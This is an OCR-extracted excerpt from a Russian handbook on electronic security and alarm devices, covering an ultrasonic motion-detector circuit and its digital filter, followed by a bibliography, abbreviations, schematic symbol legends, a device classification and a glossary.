Как было отмечено выше, основной причиной возникновения амплитудной модуляции на входе датчика является изменение интерференционной картины в охраняемом пространстве, из-за чего происходит сложение множества волн с произвольной фазой и амплитудой. Изменение амплитуды какой-либо из них, например в результате изменения угла отражения от колеблющегося оконного стекла, вызывает изменение фазы результирующего сигнала. Сложение амплитудно-модулированного сигнала и немодулированного колебания одной и той же частоты уже приводит к фазовому сдвигу, пропорциональному производной от модулирующей функции. Из этого следует, что вибрацию стекла датчик воспримет как доплеровский сдвиг. Спектр этих колебаний, в основном, сосредоточен в частотной области ниже 1—3 Гц. Теперь становится понятна и та особая роль, которая отведена фильтру Z2, особенно исходя из требований по регистрации минимальной скорости передвижения.
Детектор-формирователь U3 преобразует огибающую принимаемого сигнала в пропорциональное ей постоянное напряжение. Усилитель А2 усиливает его до уровня, необходимого для работы устройства индикации HI, обеспечивая при этом определенную задержку, дополнительно снижающую вероятность ложных срабатываний.
Принципиальная схема ультразвукового датчика изображена на рис. 6. 71. Излучателем BF1 и приемником ВМ1 ультразвуковых колебаний служат пьезоэлектрические микрофоны типа УМ-1 с частотой резонанса в интервале 36—46 кГц.
Генератор G1 собран на микросхемах DD1 и DA4 по мостовой схеме. Это сделано для того, чтобы обеспечить оптимальный уровень мощности излучения
Рис. 6. 71. Ультразвуковой датчик охранной сигнализации
при низком напряжении питания. Кроме того, мостовое включение позволяет возбудить пьезорезонатор BF1 на его собственной резонансной частоте.
Ультразвуковой излучатель BF1 включен между выходами попарно параллельно включенных инверторов DD1. 1, DD1. 2 и DD1. 3, DD1. 4, образующих мостовой выходной усилитель. Сигналы на выходах каждой пары инверторов находятся в противофазе, что позволяет обеспечить амплитудное значение напряжения на излучателе BF1 практически вдвое больше, чем напряжение питания. Параллельное включение инверторов повышает нагрузочную способность усилителя. При необходимости их число в каждом плече может быть увеличено.
Поскольку рабочую частоту генератора определяет собственная частота резонанса тока излучателя BF1, в его цепь включены датчики тока — резисторы R17 и R18. Для выделения сигнала с датчиков тока на фоне высокого амплитудного выходного напряжения мостового усилителя служат прецизионные резисторные делители R19, R20 и R21, R22. Сопротивления резисторов определяются из выражений: R20=R19+ R17 и R21=R22+ R18. Если исключить нагрузку, то и постоянное напряжение, и переменное между точками А и Б будут пропорциональны току через нагрузку.
Напряжение UAБ подано на вход дифференциального усилителя переменного напряжения, собранного на микросхеме DA4. Уровень выходного напряжения усилителя соответствует уровню срабатывания инверторов КМОП микросхемы DD1. Одновременно дифференциальный усилитель подавляет незначительную синфазную составляющую напряжения UAБ. появляющуюся из-за неизбежных отклонений сопротивлений резисторов прецизионного делителя от расчетного и возможной неидентичности значений выходных напряжений инверторов моста. Резистор R25 определяет ток, потребляемый операционным усилителем DA4, и, как следствие, скорость нарастания выходного напряжения. Емкость конденсаторов С10 и С11 имеет оптимум для каждой конкретной частоты.
Буферный инвертор DD1. 5 формирует импульсы с крутыми фронтами, что позволяет повысить КПД генератора на 20%.
Первая ступень усиления сигнала с микрофона ВМ1 выполнена на операционном усилителе DA1. Микрофон включен в цепь отрицательной обратной связи операционного усилителя так, чтобы обеспечить максимальное усиление лишь на его резонансной частоте. Вторая ступень усиления выполнена на операционном усилителе DA2, в цепь отрицательной обратной связи которого включен двойной Т-мост, настроенный на ту же резонансную частоту. Диоды VD1 и VD2 служат для ограничения выходного сигнала и предотвращения перегрузки операционного усилителя в случае, если энергия волны на входе приемника будет слишком велика.
Компаратор DA3 преобразует усиленный сигнал в импульсы прямоугольной формы, перепады которых соответствуют моментам перехода сигнала через нулевой уровень. При этом обеспечивается скважность импульсов, практически равная 2. Эти импульсы поступают на фазовый детектор, выполненный на элементе DD2. 1 (вывод 1). На второй вход фазового детектора (вывод 2 элемента DD2. 1) поступают импульсы с образцового генератора (вывод 6 элемента DD1. 5),
Рис. 6. 72. Цифровой фильтр ультразвукового датчика
имеющие скважность 2. В противном случае, не исключены случайные «провалы» в характеристике чувствительности датчика в моменты, когда образцовый и принятый сигналы окажутся в фазе или противофазе.
Сигнал с выхода фазового детектора (вывод 3 элемента DD2. 1), равный разности фаз принятого и образцового сигналов, представляет собой последовательность прямоугольных импульсов с широтно-импульсной модуляцией и поступает на вход цифрового полосового фильтра.
Цифровой полосовой фильтр (рис. 6. 72) выполнен на микросхемах DD1 — DD11. По сравнению с фильтрами, выполненными на дискретных и аналоговых элементах, цифровые фильтры более просты, надежны и не нуждаются в настройке. К тому же они имеют практически прямоугольную амплитудно-частотную характеристику, что приближает их к идеальному фильтру.
Цифровой фильтр, приведенный на рис. 6. 72, состоит из фильтра нижних и верхних частот, схем формирования коротких импульсов, решающего устройства, устройства индикации движения и образцового генератора.
Образцовый генератор выполнен на специализированной часовой микросхеме К176ИЕ12. Частота задающего генератора стабилизирована кварцевым резонатором ZQ1. С выхода генератора импульсы с частотой следования 32768 Гц поступают на встроенный делитель, с выхода S которого (вывод 6) снимается сигнал с частотой 2 Гц, а с выхода F — сигнал частотой 1024 Гц (вывод 11).
Сигнал с выхода фазового детектора (элемент DD2. 1 на рис. 6. 71) поступает на входы двух формирователей коротких импульсов на микросхемах DD1, DD3. На входы двух других формирователей (DD2 и DD4) с генератора на микросхеме DD11 поступают прямоугольные импульсы частотой 2 Гц и 1024 Гц соответственно. С выходов формирователей (выводы 11 микросхем DD1, DD2 и DD3, DD4) короткие отрицательные импульсы поступают на входы триггеров на элементах DD7. 1, DD7. 2 и DD7. 3, DD7. 4 соответственно.
Рассмотрим случай, когда частота входного сигнала равна, например, 200 Гц. В этом случае на выводе 3 элемента DD8. 1 будут присутствовать короткие отрицательные импульсы, а на выводе 4 элемента DD8. 2 — уровень логической единицы (при частоте менее 2 Гц сигналы поменяются местами). При этом триггер на элементах DD8. 3, DD8. 4 переключится в состояние, когда на его выходе (вывод 11 элемента DD8. 3) будет уровень логической единицы.
Одновременно сигнал частотой 200 Гц поступает на второй канал фильтра, где он сравнивается с сигналом генератора частотой 1024 Гц. При этом на выводе 4 элемента DD9. 2 будут присутствовать короткие отрицательные импульсы. В то же время на выводе 3 элемента DD9. 1 будет уровень логической единицы (при входной частоте более 1024 Гц сигналы на выходах этих элементов поменяются местами). Эти отрицательные импульсы переключат триггер на элементах DD9. 3, DD9. 4 в состояние, когда на его выходе (выход 10 элемента DD9. 4) будет уровень логической единицы. С триггеров сигналы высокого логического уровня поступают на устройство принятия решения на элементе DD10. 1, при этом на выходе последнего (вывод 3) появится уровень логического нуля. Конденсатор СЗ начнет разряжаться через сопротивление резистора R4 до уровня
Рис. 6. 73. Печатная плата датчика
переключения инвертора DD10. 2. В момент переключения последнего и включится индикатор HL1. Элементы VD1, R4, СЗ осуществляют задержку сигнала, что способствует повышению помехоустойчивости датчика.
Индикатор HL1 включается только в те моменты, когда частота входного сигнала более 2 Гц, но менее 1024 Гц. В иных случаях индикатор выключен и датчик не дает сигнала о наличии движущегося объекта.
Рис. 6. 74. Размещение деталей на плате датчика
Узел на операционном усилителе DA5 (рис. 6. 71) выполняет функцию формирователя «мнимого нуля» напряжения питания, необходимого для нормальной работы операционных усилителей датчика. Он обеспечивает выходное напряжение, равное половине напряжения источника питания при низком выходном сопротивлении.
Налаживание датчика обычно не вызывает трудностей. Сначала настраивают двойной Т-мост в цепи обратной связи операционного усилителя DA2 на частоту образцового генератора путем одновременного подбора сопротивлений резисторов R4, R5, R6 (или емкости конденсаторов СЗ—С5), соотношение номиналов их при этом не должно измениться.
Резисторы R19—R22 (рис. 6. 71) можно подобрать из обычных МЛТ-0, 125 номиналом 20 кОм с помощью цифрового тестера. Их сопротивление от указанного на схеме может отличаться на 20%, однако соотношение значений сопротивления, указанное выше, должно быть выдержано с точностью не хуже 0, 25%. При большой разнице не исключены фазовые сбои и даже срыв генерации.
Рис. 6. 75. Печатная плата цифрового фильтра
Цифровой полосовой фильтр (рис. 6. 72) в настройке не нуждается. Нижнюю границу фильтра можно увеличить до 17 Гц. Для этого на вход формирователя на микросхеме DD4 необходимо подать импульсы с выхода М (вывод 10) микросхемы DD11, а не с выхода F, как показано на схеме.
Устройство выполнено на двух печатных платах размером 301 60х108 мм каждая. Платы изготовлены из двухстороннего фольгированного стеклотекстолита. Печатная плата ультразвукового датчика приведена на рис. 6.73, а размещение элементов на ней — на рис. 6.74. Печатная плата цифрового фильтра представлена на рис. 6.75, размещение элементов на ней — на рис. 6.76. Платы монтируются одна над другой на металлических стойках высотой не менее 20 мм. Ультразвуковые приемник и излучатель могут быть расположены под некоторым углом друг к другу.
Ультразвуковой датчик устанавливается в таком месте, чтобы можно было контролировать все входы и выходы и в помещение нельзя было попасть, миновав поле зрения ультразвукового «глаза» (рис. 6. 77).
Для предотвращения ложного срабатывания излучатель нельзя располагать под прямым углом к вибрирующим поверхностям, типа дверей и окон или направлять на место с наибольшей циркуляцией воздуха, например на лестницы и батареи отопления.
ЛИТЕРАТУРА
1. Охранные системы. Информационное издание. Выпуск 4, М., «Солон», 1996 г.
2. Гавриш В. Практическое пособие по защите коммерческой тайны. Симфе рополь. «Таврида». 1994 г.
3. Предпринимательство и безопасность. М., Универсум. 1991 г.
4. Алексеенко В. Н., Сокольский Б. Е. Системы защиты коммерческих объек тов. Технические средства защиты. М., 1992 г.
5. Бизнес и безопасность. М., КМЦ «Центурион». 1992 г.
6. Киселев А. Е. и др. Коммерческая безопасность. М., Иноро Арт. 1993 г.
7. Технические средства охраны, безопасности и сигнализации. Справочник. ВИМИ, 1994 г.
8. Никулин О. Ю., Петрушин А. Н. Системы телевизионного наблюдения. М., «Оберег-РБ», 1997г.
9. Рейке Ч. Д. 55 электронных схем сигнализации. М., Энергоатомиздат, 1991 г.
10. Гюнтер Миль. Электронное дистанционное управление моделями. М., ДОСААФ СССР, 1980г.
11. Андрианов В. И., Бородин В. А., Соколов А. В. «Шпионские штучки» и устройства для защиты объектов и информации. Справочное пособие. «Лань», Спб., 1996г.
12. Андрианов В. И., Соколов А. В. Охранные устройства для автомобилей. «Лань» Спб. 1997 г.
13. Журнал «Системы безопасности». М., «Гротек», 1997 г.
14. Информационно-технический журнал «Техника охраны». М., НИЦ «Охрана» ВНИИПО МВД России, 1996 г.
15. Журнал «БДИ», Спб., 1996-1997 гг.
16. Журнал «Радио», М., 1986-1997 гг.
17. Журнал «Радиолюбитель», Минск, 1993—1997гг.
18. Журнал «Радиоконструктор», Вологда, 1994—1997 гг.
19. Виноградов Ю. А. Электронная охрана (элементы и узлы охранных систем). М., «Символ-Р», 1996г.
Раздел 2.
Условные и сокращенные обозначения
AC — акустическая система
БИС — большая интегральная схема
БП — блок питания
БРЭА — бытовая радиоэлектронная аппаратура
БЭ — блок электроники
В — всеклиматическое исполнение
ДН — делитель напряжения
ЕСКД — единая система конструкторской документа ции
ИМ — исполнительный механизм
ИМС — интегральная микросхема
ИП — измерительный прибор
КД — конструкторская документация
КМОП — комплементарная металлоокисно-полупроводниковая схема кпд — коэффициент полезного действия
М — морской климат
НТД — нормативно-техническая документация
О — общеклиматическое исполнение
ОУ — операционный усилитель
ПП — полупроводник
ППП — полупроводниковый прибор
ПСН — параметрический стабилизатор напряжения
РЭ — регулирующий элемент
РЭА — радиоэлектронная аппаратура
РЭУ — радиоэлектронное устройство
СИП — стабилизированный источник питания
СНПТ — стабилизатор напряжения постоянного тока
СОС — система охранной сигнализации
Т — тропический климат
ТВ — тропический влажный климат
ТД — технологическая документация
ТЗ — техническое задание
ТМ — тропический морской климат
ТС — тропический сухой климат
ТУ — технические условия
У — умеренный климат
УОС — устройство охранной сигнализации
УПТ — усилитель постоянного тока
УС — устройство сигнализации
УХЛ — умеренно холодный климат
ХИТ — химический источник тока
ХЛ — холодный климат
ЦПУ — центральный пульт управления
ЭДС — электродвижущая сила
ЭКЗ — электронный кодовый замок
ЭМ — электромагнит
ЭМС — электромагнитная совместимость
ЭСОС — электронная система охранной сигнализации
ЭРИ — электрорадиоизделие
ЭРЭ — электрорадиоэлемент
ЭУОС — электронное устройство охранной сигнализации
Глава первая. Основные требования и нормы.
1. 1. УСЛОВНЫЕ ГРАФИЧЕСКИЕ И БУКВЕННЫЕ ОБОЗНАЧЕНИЯ ЭЛЕКТРОРАДИОЭЛЕМЕНТОВ. ОТЕЧЕСТВЕННЫЕ АНАЛОГИ ЗАРУБЕЖНЫХ ЭЛЕКТРОРАДИОЭЛЕМЕНТОВ
Почти все УОС, все изделия радиоэлектроники и электротехники, изготавливаемые промышленными организациями и предприятиями, домашними мастерами, юными техниками и радиолюбителями, содержат в своем составе определенное количество разнообразных покупных ЭРИ и элементов, выпускаемых в основном отечественной промышленностью. Но за последнее время наблюдается тенденция применения ЭРЭ и комплектующих изделий зарубежного производства. К ним можно отнести в первую очередь ППП, конденсаторы, резисторы, трансформаторы, дроссели, электрические соединители, аккумуляторы, ХИТ, переключатели, установочные изделия и некоторые другие виды ЭРЭ.
Применяемые покупные комплектующие или самостоятельно изготавливаемые ЭРЭ обязательно находят свое отражение на принципиальных и монтажных электрических схемах устройств, в чертежах и другой ТД, которые выполняются в соответствии с требованиями стандартов ЕСКД.
Особое внимание уделяется принципиальным электрическим схемам, которые определяют не только основные электрические параметры, но и все входящие в устройства элементы и электрические связи между ними. Для понимания и чтения принципиальных электрических схем необходимо тщательно ознакомиться с входящими в них элементами и комплектующими изделиями, точно знать область применения и принцип действия рассматриваемого устройства. Как правило, сведения о применяемых ЭРЭ указываются в справочниках и спецификации — перечне этих элементов.
Связь перечня комплектующих ЭРЭ с их условными графическими обозначениями осуществляется через позиционные обозначения.
Для построения условных графических обозначений ЭРЭ используются стандартизованные геометрические символы, каждый из которых применяют отдельно или в сочетании с другими. При этом смысл каждого геометрического образа в условном обозначении во многих случаях зависит от того, в сочетании с каким другим геометрическим символом он применяется.
Стандартизованные и наиболее часто применяемые условные графические обозначения ЭРЭ в принципиальных электрических схемах приведены на рис. 1. 1. Эти обозначения касаются всех комплектующих элементов схем, включая ЭРЭ, проводники и соединения между ними. И здесь важнейшее значение приобретает условие правильного обозначения однотипных комплектующих ЭРЭ и изделий. Для этой цели применяются позиционные обозначения, обязательной частью которых является буквенное обозначение вида элемента, типа его конструкции и цифровое обозначение номера ЭРЭ. На схемах используется также дополнительная часть обозначения позиции ЭРЭ, указывающая функцию элемента, в виде буквы. Основные виды буквенных обозначений элементов схем приведены в табл. 1.1.
Обозначения на чертежах и схемах элементов общего применения относятся к квалификационным, устанавливающим род тока и напряжения,. вид соединения, способы регулирования, форму импульса, вид модуляции, электрические связи, направление передачи тока, сигнала, потока энергии и др.
В настоящее время у населения и в торговой сети находится в эксплуатации значительное количество разнообразных электронных приборов и устройств, радио- и телевизионной аппаратуры, которые изготавливаются зарубежными фирмами и различными акционерными обществами. В магазинах можно приобрести различные типы ЭРИ и ЭРЭ с иностранными обозначениями. В табл. 1. 2 приведены сведения о наиболее часто встречающихся ЭРЭ зарубежных стран с соответствующими обозначениями и их аналоги отечественного производства.
Эти сведения впервые публикуются в таком объеме.
Рис 1.1 Условные графические обозначения ЭРЭ в схемах электрических, радиотехнических и автоматизации
1— транзистор структуры р- n-р в корпусе, общее обозначение;
2— транзистор структуры п-р-п в корпусе, общее обозначение,
3 — транзистор полевой с p-n-переходом и п каналом,
4 — транзистор полевой с p-n-переходом и р каналом,
5 — транзистор однопереходный с базой п типа, б1, б2 — выводы
базы, э — вывод эмиттера,
6 — фотодиод,
7 — диод выпрямительный,
8 — стабилитрон (диод лавинный выпрямительный) односторонний,
9 — диод тепло-электрический,
10 — тиристор диодный, стираемый в обратном направлении;
11 — стабилитрон (диодолавинный выпрямительный) с двусторонней проводимостью,
12 — тиристор триодный.
13 — фоторезистор,
14 — переменный резистор, реостат, общее обозначение,
15 — переменный резистор,
16 — переменный резистор с отводами,
17 — построечный резистор-потенциометр;
18 — терморезистор с положительным температурным коэффициентом прямого нагрева (подогрева),
19 — варистор,
20 — конденсатор постоянной емкости, общее обозначение,
21 — конденсатор постоянной емкости поляризованный;
22 — конденсатор оксидный поляризованный электролитический, общее обозначение;
23 — резистор постоянный, общее обозначение;
24 — резистор постоянный с номинальной мощностью 0, 05 Вт;
25 — резистор постоянный с номинальной мощностью 0, 125 Вт,
26 — резистор постоянный с номинальной мощностью 0, 25 Вт,
27 — резистор постоянный с номинальной мощностью 0, 5 Вт,
28 — резистор постоянный с номинальной мощностью 1 Вт,
29 — резистор постоянный с номинальной мощностью рассеяния 2 Вт,
30 — резистор постоянный с номинальной мощностью рассеяния 5 Вт;
31 — резистор постоянный с одним симметричным дополнительным отводом;
32 — резистор постоянный с одним несимметричным дополнительным отводом;
Рис 1.1 Условные графические обозначения ЭРЭ в схемах электрических, радиотехнических и автоматизации
33 — конденсатор оксидный неполяризованный,
34 — конденсатор проходной (дуга обозначает корпус, внешний элекрод),
35 — конденсатор переменной емкости (стрелка обозначает ротор);
36 — конденсатор подстроечный, общее обозначение
37 — варикап.
38 — конденсатор помехоподавляющий;
39 — светодиод,
40 — туннельный диод;
41 — лампа накаливания осветительная и сигнальная
42 — звонок электрический
43 — элемент гальванический или аккумуляторный;
44 — линия электрической связи с одним ответвлением;
45 — линия электрической связи с двумя ответвлениями;
46 — группа проводов, подключенных к одной точке электрическою соединения. Два провода;
47 — четыре провода, подключенных к одной точке электрическою соединения;
48 — батарея из гальванических элементов или батарея аккумуляторная;
49 — кабель коаксиальный. Экран соединен с корпусом;
50 — обмотка трансформатора, автотрансформатора, дросселя, магнитного усилителя;
51 — рабочая обмотка магнитного усилителя;
52 — управляющая обмотка магнитного усилителя;
53 — трансформатор без сердечника (магнитопровода) с постоянной связью (точками обозначены начала обмоток);
54 — трансформатор с магнитодиэлектрическим сердечником;
55 — катушка индуктивности, дроссель без магнитопровода;
56 — трансформатор однофазный с ферромагнитным магнитопроводом и экраном между обмотками;
57 — трансформатор однофазный трехобмоточный с ферромагнитным магнитопроводом с отводом во вторичной обмотке;
58 — автотрансформатор однофазный с регулированием напряжения;
59 — предохранитель;
60 — предохранитель выключатель;
б/ — предохранитель-разъединитель;
62 — соединение контактное разъемное;
63 — усилитель (направление передачи сигнала указывает вершина треугольника на горизонтальной линии связи);
64 — штырь разъемного контактного соединения;
Рис 1.1 Условные графические обозначения ЭРЭ в схемах электрических радиотехнических и автоматизации
65 — гнездо разъемною контактного соединения,
66 — контакт разборного соединения например с помощью зажима
67 — контакт неразборного соединения, например осуществленного пайкой
68 — выключатель кнопочный однополюсный нажимной с Замыкающим контактом самовозвратом
69 — контакт коммутационного устройства размыкающий, общее обозначение
70 — контакт коммутационного устройства
(выключателя, реле) замыкающий, общее обозначение. Выключатель однополюсный.
71 — контакт коммутационного устройства переключающий, общее обозначение. Однополюсный переключатель на два направления. 72— контакт переключающий трехпозиционный с нейтральным положением
73 — контакт замыкающий без самовозврата
74 — выключатель кнопочный нажимной с размыкающим контактом
75 — выключатель кнопочный вытяжной с замыкающим контактом
76 — выключатель кнопочный нажимной с возвратом кнопки,
77 — выключатель кноночный вытяжной с размыкающим контактом
78 — выключатель кнопочный нажимной с возвратом посредством вторичного нажатия кнопки,
79 — реле электрическое с замыкающим размыкающим и переключающим контактами,
80 — реле поляризованное на одно направление тока в обмотке с нейтральным положением
81 — реле поляризованное на оба направления тока в обмотке с нейтральным положением
82 — реле электротепловое без самовозврата, с возвратом посредством вторичного нажатия кнопки,
83- разъемное однополюсное соединение
84 — гнездо пятипроводного контактного разъемного соединения,
85 штырь контактного разъемного коаксиального соединения
86 — гнездо контактною соединения
87 — штырь четырехпроводного соединения,
88 гнездо четырехпроводного соединения
59 — перемычка коммутационная размыкающая цепь
Таблица 1.1. Буквенные обозначения элементов схем
Продолжение табл.1.1
Окончание табл. 1.1
Таблица 1.2. Отечественные аналоги зарубежных электрорадиоэлементов
Продолжение табл. 1. 2
Продолжение табл. 1.2
Продолжение табл. 1.2
Продолжение табл. 1.2
Продолжение табл.1. 2
Продолжение табл. 1.2
Окончание табл.1. 2
1. 2. КЛАССИФИКАЦИЯ ЭЛЕКТРОННЫХ УСТРОЙСТВ ОХРАНЫ И СИГНАЛИЗАЦИИ
Все рассматриваемые в этом справочнике электронные устройства бытового и общепромышленного применения могут быть классифицированы по многочисленным признакам: функциональному назначению; конструктив ному исполнению; технологии изготовления; условиям применения и эксплуатации, учитывающим устойчивую работу при воздействии внешних факторов; виду входной электроэнергии; конструктивно-технологическим признакам; схемотехническим решениям; количеству охраняемых объектов; способам защиты; факторам электромагнитной защищенности; технико-экономическим признакам и др Рассмотрим некоторые из них.
Функциональное назначение. Классификация ЭУОС по данному признаку предусматривает достаточно жесткое распределение этих изделий по выполняемым ими функциям. Иногда в одном устройстве сочетаются различные функции, которые определяются при конструировании в ТЗ и зависят от назначения и области применения изделия. Согласно этому признаку ЭУОС подразделяются на сигнальные, оповещающие, охранные, отключающие, запирающие и др. Характеристика всех функциональных признаков рассматриваемых устройств подробно раскрывается при описании конкретных изделии этого типа.
Конструктивное исполнение. Этот классификационный признак является для многих ЭУОС наиболее существенным при определении технических возможностей начинающего радиолюбителя, оборудовании мастерских и лабораторий необходимой измерительной аппаратурой и средствами технологического оснащения. В основе классификации но этому признаку лежит конструкция изделия, его конфигурация, внешнее оформление, эргономические и эстетические показатели, которые определяются областью применения конкретного устройства и местом расположения на охраняемом объекте. Очень часто при конструировании УОС приходится учитывать особенности охраняемых объектов, их геометрические размеры, объем и форму, и даже их статические и динамические характеристики, если речь идет о средствах передвижения или стационарных объектах.
Классифицируются УОС по конструктивному исполнению на встраиваемые, автономные в виде самостоятельных сборочных единиц и комбинированные. Электронная часть УОС, как правило, собирается в отдельных пластмассовых или металлических корпусах с электрическим монтажом комплектующих ЭРЭ на печатных платах. Печатные платы выполняются из фольгированного стеклотекстолита или гетинакса толщиной 1, 5... 2 мм.
Необходимо заметить, что в данном справочнике при описании УОС не даются прямые указания по их конструктивному исполнению, то есть предоставляется достаточная самостоятельность для разработки конкретных конструкций. Но во всех случаях радиолюбители должны сначала осуществить эскизную проработку, а затем выполнить конструкторскую разработку УОС с оформлением чертежей деталей и сборочных единиц. Такая проработка должна осуществляться в соответствии с требованиями стандартов государственной системы ЕСКД.
Тенденции развития электронной техники и электротехники на базе микроминиатюризации требуют применения широкой номенклатуры маломощных и малогабаритных устройств и изделий (преобразователей, трансформаторов, усилителей, фильтров, стабилизаторов, выпрямителей и т. д.), выполненных на новой конструктивной основе ЭРЭ. Достижения науки и техники на современном этапе развития в области электронной техники позволяют значительно уменьшить массогабаритные характеристики рассматриваемых электронных устройств. В настоящее время конструирование РЭА, РЭУ и ЭРЭ характеризуется резким увеличением применения БИС, что также дает возможность уменьшить объемы устройств и одновременно улучшить их качественные характеристики, показатели надежности и долговечности.
Технология изготовления. Классификация ЭУОС по данному признаку определяет вес основные и заключительные операции изготовления изделий и является главной при оценке их трудоемкости и стоимости.
В условиях радиолюбительских лабораторий и домашних мастерских, которые оснащены, как правило, несложным технологическим оборудованием, наиболее простой операцией изготовления УОС является традиционное ручное производство деталей и сборочных единиц, из которых впоследствии выполняются узлы, блоки и самостоятельные сборки. Это позволяет условно классифицировать данные устройства по технологическим признакам на простые, средней сложности и сложные.
К простым технологическим изделиям относятся такие, в которых конструкция и схема ЭУОС содержат набор деталей и ЭРЭ из резисторов, конденсаторов, электромеханических реле и ППП малой мощности с общим количеством, не превышающим 10 единиц. При этом сборка и монтаж устройств осуществляются преимущественно с помощью объемного навесного монтажа и винтовых соединений.
Электронные УОС средней технологической сложности включают в свой состав кроме указанных комплектующих ЭРЭ транзисторы малой и средней мощности, тиристоры, герконы, индикаторы, ППП и другие, электрический монтаж которых осуществляется преимущественно с помощью печатного монтажа. Общее количество деталей и комплектующих ЭРЭ в устройствах средней технологической сложности может превысить 50 единиц. Если электропитание простых устройств осуществляется от встроенных ХИТ, то изделия средней технологической сложности получают его от вторичных источников, имеющих в своем составе преобразователи
энергии, выпрямительные устройства и стабилизаторы напряжения параметрического или компенсационного типов, работающие от сети переменного тока напряжением 220 В, частотой 50 Гц.
Сложные изделия и устройства включают в свой состав десятки и сотни комплектующих ЭРЭ и механических деталей. Принципиальные электрические схемы этих устройств содержат многообразные ИМС и БИС. С точки зрения технологии изготовления, сложные изделия характеризуются повышенным уровнем трудоемкости и часто могут быть реализованы лишь в условиях хорошо оснащенных домашних мастерских. Следует заметить, что только для распайки выводов ИМС, собранных в стандартных корпусах с 14 или 16 выводами, потребуется изготовить сначала специальные приспособления, а сама пайка выполняется при строго определенных режимах нагрева во времени.
Сложные технологические изделия имеют, как правило, комбинированное электропитание: от сети переменного тока и от автономного источника. В качестве автономных источников электропитания могут выступать различные ХИТ: гальванические элементы и батареи, аккумуляторы разных систем.
Структурная схема признаков классификации УОС, построенных на базе электроники, рассмотрена на рис. 1. 2.
Структурная схема условного деления электронных систем защиты и сигнализации на функциональные узлы и самостоятельные сборочные единицы приведена на рис. 1. 3.
Условия применения и эксплуатации. Классификация электронных устройств данного класса по этому признаку, основные нормы и требования для каждой классификационной группы но климатическим (температуре, повышенной влажности и атмосферному давлению) и механическим (синусоидальной вибрации и механическому удару) воздействиям приведены в табл. 1. 3. и 1. 4. Значения повышенной и пониженной рабочих температур даются при рассмотрении конкретных изделий и, как правило, указываются в ТУ на данное устройство. Рабочую температуру выбирают из следующего параметрического ряда: —40, —35, —30, —25, —22, —20, —18, -15, -10, -5, 0, 5, 10, 15, 18, 20, 22, 25, 27, 30, 40, 45, 50, 55, 70, 85, 100, 125 °С.
Рис.1.2 Структурная схема признаков классификации устройств охраны и сигнализации
Рис. 1.3 Структурная схема условного деления электронных систем защиты и сигнализации
Таблица 1.3 Классификация УОС по климатическим воздействиям
Группы исполнения ЭУОС выбирается исходя из условий применения, норм и требований, их конструктивных исполнений, а также достигнутого уровня стойкости в частности механических и климатических воздействий. Устройства, создание которых невозможно или нецелесообразно по требованиям изложенным в табл. 1. 4 и 1. 5, должны разрабатываться по менее жестким требованиям с учетом возможных мер индивидуальной или общей защиты. Рис.12 Структурная схема признаков классификации устройств охраны и сигнализации.
Таблица 1.4. Классификация ЭКЗ и УОС по механическим воздействиям
1.3. ОСНОВНЫЕ ПОНЯТИЯ И ИХ ОПРЕДЕЛЕНИЯ
Аккумулятор вторичный химический источник тока, состоящий из одного гальванического элемента.
Аккумуляторная батарея — вторичный химический источник тока, состоящий из двух и более аккумуляторов, соединенных между собой электрически для совместного производства электрической энергии.
Активный фильтр — электрический частотный фильтр, содержащий один или несколько усилительных элементов.
Время готовности электронного УОС — интервал времени между моментом подачи входного напряжения и моментом, после которого параметры этих устройств удовлетворяют заданным требованиям.
Гальваническая связь — связь электрических цепей посредством электрического поля в проводящей среде.
Гальванический элемент — химический источник тока, состоящий из одной гальванической ячейки.
Емкость конденсатора — электрическая емкость между электродами конденсатора.
Диэлектрик — вещество, основным электрическим свойством которого является способность поляризоваться в электрическом поле.
Источник вторичного электропитания электронного устройства — средство вторичного электропитания УОС, обеспечивающее вторичным электропитанием самостоятельные функциональные узлы или отдельные цепи этих устройств.
Компенсационный стабилизатор напряжения вторичного электропитания — стабилизатор напряжения вторичного электропитания, в котором стабилизация осуществляется за счет воздействия изменения выходного напряжения на его регулирующее устройство через цепь обратной связи.
Коэффициент трансформации отношение числа витков вторичной обмотки к числу витков первичной или отношение напряжения на вторичной обмотке к напряжению на первичной обмотке в режиме холостого хода без учета падения напряжения на трансформаторе.
Конденсатор — элемент электрической цепи, предназначенный для использования его емкости.
Коэффициент стабилизации напряжения источника вторичного электропитания электронного устройства отношение относительного о изменения входного напряжения электропитания к выходному напряжению, вызванному им относительного изменения выходного напряжения
Вероятность безотказной работы — вероятность того, что в пределах заданной наработки отказ электронного У ОС не возникает.
Временное резервирование — резервирование с применением резервов времени.
Время восстановления работоспособности электронного УОС — продолжительность восстановления работе способного состояния объекта.
Комплексный показатель надежности — показатель надежности, характеризующий несколько свойств, составляющих надежность УОС.
Надежность сторожевого и сигнального устройства свойство изделия выполнять заданные функции, сохраняя свои эксплуатационные показа гели в заданных пределах в течение требуемого промежутка времени или требуемой наработки на отказ.
Напряжение питания — постоянное или переменное напряжение на входе аппаратуры, на которое она должна быть рассчитана.
Напряжение химического источника тока — разность потенциалов между выводами химического источника тока
Наработка — продолжительность или объем работы изделия, измеряемые в часах, километрах, циклах или других единицах.
Наработка на отказ — среднее значение наработки ремонтируемого изделия между отказами.
Необслуживаемый объект (сторожевое и сигнальное устройство) — объект, для которого проведение технических обслуживаний не предусмотрено в НТД или КД.
Начальное напряжение химического источника тока — напряжение химического источника тока в начале разряда, а при прерывистом разряде в начале первого периода разряда.
Номинальное напряжение питания — условное значение напряжения, относительно которого устанавливают допускаемые отклонения.
Номинальное напряжение химического источника тока — напряжение химическою источника тока, указанное изготовителем, характеризующее данный химический источник тока.
Напряженность магнитного поля — векторная величина, равная геометрической разности магнитной индукции, деленной на магнитную постоянную, и намагниченности.
Однофазное электротехническое устройство — электротехническое устройство, предназначенное для включения в однофазную электрическую цепь и не предназначенное для преобразования числа фаз.
Одноканальный источник вторичного электропитания сторожевых и сигнальных устройств — источник вторичного электропитания, имеющий один выход.
Основная приведенная погрешность — отношение погрешности измерительного прибора, используемого в нормальных условиях эксплуатации, к нормирующему значению.
Параметрический стабилизатор напряжения вторичного электропитания сторожевых и сигнальных устройств — стабилизатор напряжения вторичного электропитания, в котором отсутствует цепь обратной связи и стабилизация осуществляется за счет использования нелинейных элементов, входящих в его состав.
Полупроводник — вещество, основным свойством которого является сильная зависимость его электропроводимости от воздействия внешних факторов.
Показатель надежности — количественная характеристика одного или нескольких свойств, составляющих надежность объекта.
Рабочее напряжение питания — напряжение, находящееся в пределах допускаемых отклонений от номинального напряжения, в которых обеспечивается работа УОС в заданных пределах.
Резистор — элемент электрической цепи, предназначенный для использования его электрического сопротивления.
